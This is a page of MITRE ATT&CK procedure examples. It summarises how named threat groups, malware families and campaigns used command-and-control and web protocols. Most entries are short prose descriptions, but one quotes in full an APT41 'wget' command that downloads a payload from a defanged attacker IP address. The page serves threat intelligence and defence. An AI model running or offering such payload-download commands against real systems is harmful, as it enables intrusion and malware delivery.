ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

17136 examples

TechniqueUsed byProcedure example
T1070.009
Clear Persistence
ToolMCMD

MCMD has the ability to remove set Registry Keys, including those used for persistence.

T1070.010
Relocate Malware
MalwareBRICKSTORM

BRICKSTORM has copied itself to the `usr/sbin/` folder.

T1071
Application Layer Protocol
CampaignFrostyGoop Incident

During FrostyGoop Incident, the adversary initiated Layer Two Tunnelling Protocol (L2TP) connections to Moscow-based IP addresses.

T1071
Application Layer Protocol
GroupTeamTNT

TeamTNT has used an IRC bot for C2 communications.

T1071
Application Layer Protocol
GroupRocke

Rocke issued wget requests from infected systems to the C2.

T1071
Application Layer Protocol
GroupINC Ransom

INC Ransom has used valid accounts over RDP to connect to targeted systems.

T1071
Application Layer Protocol
GroupVelvet Ant

Velvet Ant has used reverse SSH tunnels to communicate to victim devices.

T1071
Application Layer Protocol
GroupMagic Hound

Magic Hound malware has used IRC for C2.

T1071
Application Layer Protocol
MalwareHildegard

Hildegard has used an IRC channel for C2 communications.

T1071
Application Layer Protocol
MalwareQUIETEXIT

QUIETEXIT can use an inverse negotiated SSH connection as part of its C2.

T1071
Application Layer Protocol
MalwareRaspberry Robin

Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.

T1071
Application Layer Protocol
MalwareSiloscape

Siloscape connects to an IRC server for C2.

T1071
Application Layer Protocol
MalwareNightdoor

Nightdoor uses TCP and UDP communication for command and control traffic.

T1071
Application Layer Protocol
MalwareNETEAGLE

Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.

T1071
Application Layer Protocol
MalwareLucifer

Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.

T1071
Application Layer Protocol
MalwareClambling

Clambling has the ability to use Telnet for communication.

T1071
Application Layer Protocol
ToolSliver

Sliver can utilize the Wireguard VPN protocol for command and control.

T1071
Application Layer Protocol
MalwareDuqu

Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.

T1071.001
Web Protocols
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.

T1071.001
Web Protocols
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls.

T1071.001
Web Protocols
CampaignFrankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.

T1071.001
Web Protocols
CampaignRedDelta Modified PlugX Infection Chain Operations

Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.

T1071.001
Web Protocols
CampaignOperation MidnightEclipse

During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads.

T1071.001
Web Protocols
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.

T1071.001
Web Protocols
CampaignIndian Critical Infrastructure Intrusions

During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports.

T1071.001
Web Protocols
Campaign3CX Supply Chain Attack

During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request.

T1071.001
Web Protocols
CampaignC0018

During C0018, the threat actors used HTTP for C2 communications.

T1071.001
Web Protocols
CampaignC0021

During C0021, the threat actors used HTTP for some of their C2 communications.

T1071.001
Web Protocols
CampaignJuicy Mix

During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2.

T1071.001
Web Protocols
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.

T1071.001
Web Protocols
CampaignOperation CuckooBees

During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.

T1071.001
Web Protocols
CampaignOuter Space

During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API.

T1071.001
Web Protocols
CampaignArcaneDoor

ArcaneDoor command and control activity was conducted through HTTP.

T1071.001
Web Protocols
CampaignAPT41 DUST

APT41 DUST used HTTPS for command and control.

T1071.001
Web Protocols
CampaignNight Dragon

During Night Dragon, threat actors used HTTP for C2.

T1071.001
Web Protocols
CampaignVersa Director Zero Day Exploitation

Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.

T1071.001
Web Protocols
CampaignOperation Wocao

During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.

T1071.001
Web Protocols
CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

T1071.001
Web Protocols
CampaignQuad7 Activity

Quad7 Activity has used the same User Agents of Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko and Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 combined with a reference to the Microsoft Azure PowerShell Application ID 1950a258-227b-4e31-a9cf-717495945fc2 in their sign-in attempts.

T1071.001
Web Protocols
GroupAPT38

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.

T1071.001
Web Protocols
GroupBlackByte

BlackByte collected victim device information then transmitted this via HTTP POST to command and control infrastructure.

T1071.001
Web Protocols
GroupKimsuky

Kimsuky has used HTTP GET and POST requests for C2.

T1071.001
Web Protocols
GroupAPT41

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.

T1071.001
Web Protocols
GroupAPT32

APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.

T1071.001
Web Protocols
GroupHAFNIUM

HAFNIUM has used open-source C2 frameworks, including Covenant.

T1071.001
Web Protocols
GroupMuddyWater

MuddyWater has used HTTP for C2 communications.

T1071.001
Web Protocols
GroupRedEcho

RedEcho network activity is associated with SSL traffic via TCP 443 and proxied HTTP traffic over non-standard ports.

T1071.001
Web Protocols
GroupGamaredon Group

Gamaredon Group has used HTTP and HTTPS for C2 communications.

T1071.001
Web Protocols
GroupTeamTNT

TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software. TeamTNT has also used a custom user agent HTTP header in shell scripts.

T1071.001
Web Protocols
GroupSandworm Team

Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.